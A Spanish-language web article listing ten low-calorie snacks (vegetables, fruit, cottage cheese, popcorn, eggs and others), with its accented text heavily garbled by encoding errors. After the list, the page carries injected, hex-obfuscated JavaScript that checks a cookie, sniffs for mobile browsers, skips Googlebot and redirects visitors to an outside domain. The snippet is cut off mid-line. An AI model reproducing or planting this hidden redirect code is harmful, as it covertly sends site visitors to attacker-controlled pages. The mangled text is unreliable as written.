Entretenimiento

6 Jun 2015
Entretenimiento | Por: Redacción

10 snacks que no afectarA?n tu salud

Comer un aperitivo no tienen por quAi?? ser malo o afectar tu salud ni tu dieta; por el contrario, pueden ayudarte a mejor tu alimentaciA?n y darte un gustito que no podAi??s todos los dAi??as. A?CuA?l otro agregarAi??as?

  1. Plato de vegetales. A?Has probado esas verduritas crudas ya cortadas y lavadas que venden en el supermercado? Puedes hacer las tuyas. PonAi?? en un pequeAi??o recipiente rodajas de pimiento, zanahorias y coliflor. No solo tiene un aspecto excelente sino que son deliciosas.snack2
  2. Fruta fresca. LlevA? siempre con vos una fruta fresca. Si tenAi??s tiempo, hacete una ensalada o cA?ctel. PodAi??s combinar fresas, moras, arA?ndanos y uvas. TambiAi??n podAi??s hacerlo con fruta congelada. SerA? un snack fresco y serA? delicioso a la hora del hambre.snack3
  3. Queso Cottage. Media taza de queso cottage light tiene menos de 100 calorAi??as. Es bajo en grasas, pero elevado en proteAi??nas, asAi?? que es perfecto para un snack cremoso. A?Te suena desconocido el queso cottage? Pues te contamos que es el mismo que popularmente en El Salvador le llamamos ai???requesA?nai???.snack4
  4. Palomitas. Una gran opciA?n es el pop corn. Puede ser bajo en calorAi??as, es bueno para el corazA?n y muy nutritivo, ademA?s de rico en fibra. El que podAi??s preparar en el microondas tiene solo 30 calorAi??as por porciA?n. No le pongA?s mantequilla.snacks5
  5. Una manzana al dAi??a. Las manzanas contienen carbohidratos complejos, asAi?? que te dan mucha energAi??a y mA?s rA?pido que cualquier cosa azucarada. AdemA?s, no tiene grasas ni colesterol.snack6
  6. Algo saladito. Ponele a algA?n pan tostado un poco de mantequilla de cacahuate o similar que sea de tu gusto y ya la hiciste. Te ayudarA? a manejar tu antojo de algo salado y te darA? un delicioso snack lleno de proteAi??nas.snack7
  7. A?Arriba el griego! El yogurt griego bajo en calorAi??as tiene la mitad de azA?car y sodio que los otros yogures. Alto en proteAi??nas y bajo en carbohidratos, este es un antojo fantA?stico que combina muy bien con fruta fresca o polvo de coco.snack8
  8. A?Y el chocolate? Puede que pasAi??s toda la semana deseando una barra de chocolate, pero al ver toda la informaciA?n nutricional te desanimA?s. Por eso, es mejor que prefirA?s algo caserito. Un pudding de chocolate sin azA?car es una excelente. Tiene mA?s o menos 40 calorAi??as por media taza. Es algo que podAi??s disfrutar sin sentir culpa. Una mejor alternativa es un trocito de chocolate negro.snack9
  9. HuevomanAi??a. Los huevos cocidos son fA?ciles de tener listos antes de la hora del hambre. Es fA?cil agarrar uno del refrigerador antes de irte por la maAi??ana. Es una gran fuente de vitamina B12 y proteAi??nas, y ademA?s solo tienen unas 80 calorAi??as por unidad.snack10
  10. Para untar. PodAi??s untar en un panecillo un poco de crema de espinaca. Este dip es bajo en grasa y lo podAi??s acompaAi??ar incluso con galletas saladas.snack11

(Cuidado al momento de hacer un currAi??culo)var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge 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